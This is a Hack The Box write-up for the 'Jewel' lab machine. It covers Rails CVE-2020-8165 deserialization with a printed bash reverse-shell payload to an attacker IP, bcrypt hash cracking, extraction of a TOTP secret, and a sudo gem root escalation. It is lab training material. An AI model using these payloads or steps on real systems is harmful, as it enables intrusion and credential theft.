Experience is a jewel, and it need be so, for it is often purchased at an infinite rate.
William Shakespeare
About Jewel
In this post, I’m writing a write-up for the machine Jewel from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills
Jewel is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15 and submitting the root flag you points will be raised by 30.
Foothold
The Nmap port scan had discovered three open ports. The two ports which are interesting are 8000/tcp and 8080/tcp, both ports are servicing a web service. After checking the web services and found in the Gitweb log that the backend is using Rails version 2.1.1. This version has a vulnerability, also known as CVE-2020-8165.
User
After exploiting the vulnerability, I was able to establish a reverse shell as the user bill, and I can directly read the user flag.
Root
The root part was the most interesting part of this machine, IMO. After the enumeration, I had found four bcrypt hashes. John was able to crack the password from the user bill, and the sudo -l command is asking for a verification code. Sudo is protected with second-factor authentication. From the home folder of the user bill, I had found the Google Authenticator file with the Secret. With this secret, I could configure the Google Authenticator for the second-factor verification. The code depends on the system time. After syncing my system time with the time of the box, the second-factor authentication with the provided code from the Google Authenticator works. The user account bill has permission to run gem as sudo. GTFObins was the solution to gain root privileges and read the root flag.
Machine Info
| Machine Name: | Jewel |
| Difficulty: | Medium |
| Points: | 30 |
| Release Date: | 10 Oct 2020 |
| IP: | 10.10.10.211 |
| Creator: | polarbearer |
Recon
Port scan with Nmap
As always I start the box with a port scan with Nmap.
1
~$ nmap -sC -sV -oA ./nmap/10.10.10.211 10.10.10.211
The results.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-30 21:48 UTC
Nmap scan report for 10.10.10.211
Host is up (0.017s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
| 256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_ 256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open http Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: 10.10.10.211 Git
|_Requested resource was http://10.10.10.211:8000/gitweb/
8080/tcp open http nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!
Service Info: Host: jewel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.59 seconds
This machine acts as a webserver. The interesting is the banner on the alternative HTTP port 8080/tcp. Phusion Passenger 6.0.6 and the directory /gitweb is visible.
Enumeration
Enumeration Webserver
I visited the URL http://10.10.10.211:8080 and landed the website BLOG! There is a Sign-Up and login button visible on the right top corner. So, let’s register a user account.
After~creating the account and logging in, there is nothing interesting to find. I found some articles and two usernames jennifer and bill. After clicking some around, I switched to the HTTP port, 8000/tcp. I visited the URL http://10.10.10.211:8000 and the page got’s redirected to http://10.10.10.211:8000/gitweb/.
I checked the used Gitweb version 2.20.1, which contains several vulnerabilities. I played some around with CVE-2019-19604, a OS command execution vulnerability. But I was not able to get this exploit working. I decided to look further for other attack vectors.
After some searching and clicking around on this Gitweb page, I saw that Bill had placed a commit that changed 134 files, On September, 17th 2020. This commit has the name ‘initial commit’. After checking the log of this commit, I found some software versions listed in the contents of the files, like ‘ruby 2.5.5.’ and ‘rails .2.2.1’.
After a search on Google, I found that Rails 2.2.1 had a Remote Code Execution (RCE) vulnerability. The description of this vulnerability, according to Rapid7: ‘A deserialization of untrusted data vulnerability exists in rails < 5.2.4.3, rails < 6.0.3.1 that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE.’
Intrusion
CVE-2020-8165
After some searching again on Google for a Proof-Of-Concept (PoC), I found one on Github. After carefully reading the payload, I found that this payload has a typo, there is an ‘=‘ missing to define the payload variable.
1
2
3
4
5
6
7
8
9
10
11
~$ git clone https://github.com/masahiro331/CVE-2020-8165.git
git clone https://github.com/masahiro331/CVE-2020-8165.git
Cloning into 'CVE-2020-8165'...
remote: Enumerating objects: 96, done.
remote: Counting objects: 100% (96/96), done.
remote: Compressing objects: 100% (74/74), done.
remote: Total 96 (delta 13), reused 88 (delta 9), pack-reused 0
Unpacking objects: 100% (96/96), 1.02 MiB | 1.33 MiB/s, done.
~$ bundle install --path vendor/bundle
~$ bundle exec rails db:migrate
~$ bundle exec rails s
Now access the rails console.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
~$ sudo bundle exec rails console
Running via Spring preloader in process 17770
Loading development environment (Rails 5.2.3)
WARNING: This version of ruby is included in macOS for compatibility with legacy software.
In future versions of macOS the ruby runtime will not be available by
default, and may require you to install an additional package.
irb(main):001:0> code = '`/bin/bash -c "bash -i >& /dev/tcp/10.10.14.38/4444 0>&1"`'
irb(main):001:0> erb = ERB.allocate
irb(main):001:0> erb.instance_variable_set :@src, code
irb(main):001:0> erb.instance_variable_set :@filename, "1"
irb(main):001:0> erb.instance_variable_set :@lineno, 1
irb(main):001:0> payload = Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result)
irb(main):001:0> puts "Payload"
irb(main):001:0>
irb(main):001:0> require 'uri'
irb(main):001:0> puts URI.encode_www_form(payload: payload)
After the last command, I got the payload. This is my payload.
1
%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%3F%60%2Fbin%2Fbash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.10.14.38%2F4444+0%3E%261%22%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T
The second step is to put this payload in an HTTP request and sent it to the webserver. Put payload through Burp Suite on the profile update page. The username in the request needs to be replaced with the payload.
Now, I replace my username with the payload and send the payload with the RCE to the webserver.
The last step is going to the homepage, and the server is requesting my updated username with the reverse shell payload and the payload got’s executed.
1
2
3
4
Connection from 10.10.10.211:59414
bash: cannot set terminal process group (793): Inappropriate ioctl for device
bash: no job control in this shell
bill@jewel:~/blog$
The next step is to grab the user flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
bill@jewel:~/blog$ ls
ls
app
bd.sql
bin
config
config.ru
db
Gemfile
Gemfile.lock
lib
log
node_modules
package.json
public
Rakefile
README.md
storage
test
tmp
vendor
yarn.lock
bill@jewel:~/blog$ cd /home
cd /home
bill@jewel:/home$ ls
ls
bill
bill@jewel:/home$ cd bill
cd bill
bill@jewel:~$ cat user.txt
cat user.txt
b3c76eb0ffdac2b874ffe75d4d6f0191
bill@jewel:~$
Privilege Escalation
Enumeration
First, upgrade the shell and then I can start the enumeration for root. Let’s start the enumeration from the home folder of the user account Bill.
1
2
bill@jewel:~/blog$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
When I run the command sudo -l, I need to fill in a password. I do not have the password so I left the password empty. The response from this box is quite fun. After filling in no password or the wrong password, the box is generating random messages. This what I need to keep in mind. When I have the password of bill, this command can be the next step.
I downloaded linpeas.sh to the machine and after running the script, it has found two password hashes. Let’s try to crack both of them with my little buddy John the Ripper.
1
2
3
[+] Searching specific hashes inside files - less false positives (limit 70)
/var/backups/dump_2020-08-27.sql:$2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO
/home/bill/blog/bd.sql:$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
The hashes are hashed with a bcrypt [Blowfish 32/64 X3]) hash, I have pasted the hashes in a file called hashes.txt. After more searching, I found another hash in the file /home/bill/blog/bd.sql and from the http://10.10.10.211:8000/gitweb/?p=.git;a=patches file. I gave these hashes to john, and run them against the rockyou.txt wordlist.
1
2
3
$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy
$2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO
$2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW
After a couple of seconds, I got the password spongebob, after some testing, I found that this is the password for the user account bill.
1
2
3
4
5
~$ john hashes.txt -wordlist=../../wordlists/rockyou.txt
Loaded 4 password hashes with 4 different salts (bcrypt [Blowfish 32/64 X3])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:35 0% 0g/s 2.425p/s 9.868c/s 9.868C/s naruto..sweety
spongebob (?)
Now, I can run the sudo -l command, because I have the password.
1
2
3
4
5
bill@jewel:~/blog$ sudo -l
sudo -l
[sudo] password for bill: spongebob
Verification code:
Well, that’s interesting. It seems I need another step of verification.
Enumeration two-step verification
I need to find a way to get into the two-step verification. Most people are using Google Authenticator as second-factor authentication. So, let’s check if I can find something about Google. I checked the home folder of the user account bill and there is a file about the Google Authenticator.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
~$ bill@jewel:~$ ls -la
ls -la
total 52
drwxr-xr-x 6 bill bill 4096 Sep 17 14:10 .
drwxr-xr-x 3 root root 4096 Aug 26 09:32 ..
lrwxrwxrwx 1 bill bill 9 Aug 27 11:26 .bash_history -> /dev/null
-rw-r--r-- 1 bill bill 220 Aug 26 09:32 .bash_logout
-rw-r--r-- 1 bill bill 3526 Aug 26 09:32 .bashrc
drwxr-xr-x 15 bill bill 4096 Nov 5 21:41 blog
drwxr-xr-x 3 bill bill 4096 Aug 26 10:33 .gem
-rw-r--r-- 1 bill bill 43 Aug 27 10:53 .gitconfig
drwx------ 3 bill bill 4096 Nov 5 19:40 .gnupg
-r-------- 1 bill bill 56 Aug 28 07:00 .google_authenticator
drwxr-xr-x 3 bill bill 4096 Aug 27 10:54 .local
-rw-r--r-- 1 bill bill 807 Aug 26 09:32 .profile
lrwxrwxrwx 1 bill bill 9 Aug 27 11:26 .rediscli_history -> /dev/null
-r-------- 1 bill bill 33 Nov 4 19:54 user.txt
-rw-r--r-- 1 bill bill 116 Aug 26 10:43 .yarnrc
I have opened the file .google-authenticator and the secret is visible! With this secret, I’m able to configure the second-factor authentication.
1
2
3
4
5
bill@jewel:~$ cat .google_authenticator
cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTH
I added the Authenticator by mymindstorm to my FireFox.
After the configuration of the plugin with the Secret, I’m able to get the OTP from Google. I tried the code on the account from the user account bill, with the sudo -l command, but I received an error. Again, with a custom message.
1
2
3
4
5
6
7
8
bill@jewel:~$ sudo -l
sudo -l
[sudo] password for bill: spongebob
Verification code: 699658
Error "Operation not permitted" while writing config
I don't wish to know that.
Own the machine
After doing some research, I found that the verification code get’s calculated by the time of the machine. So, the time of my machine needs to be in sync with the box. The box is using the Europe/London timezone. after setting my machine in that timezone, I was able to enter the verification code correctly.
1
2
3
4
5
6
7
Matching Defaults entries for bill on jewel:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
insults
User bill may run the following commands on jewel:
(ALL : ALL) /usr/bin/gem
Bill has the permissions to run gem as sudo. I know that GTFObins have some nice commands to break out the restricted environments: [gem |
GTFObins](https://gtfobins.github.io/gtfobins/gem/){:target=”_blank”}. |
I ran this commando and was able to read the root flag.
1
2
3
4
5
bill@jewel:~$ sudo gem open -e "/bin/sh -c /bin/sh" rdoc
sudo gem open -e "/bin/sh -c /bin/sh" rdoc
# cat /root/root.txt
cat /root/root.txt
20e32770bb20e703e4149c4690431076
Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856.com/profile/224856. Thanks!
Happy Hacking :-)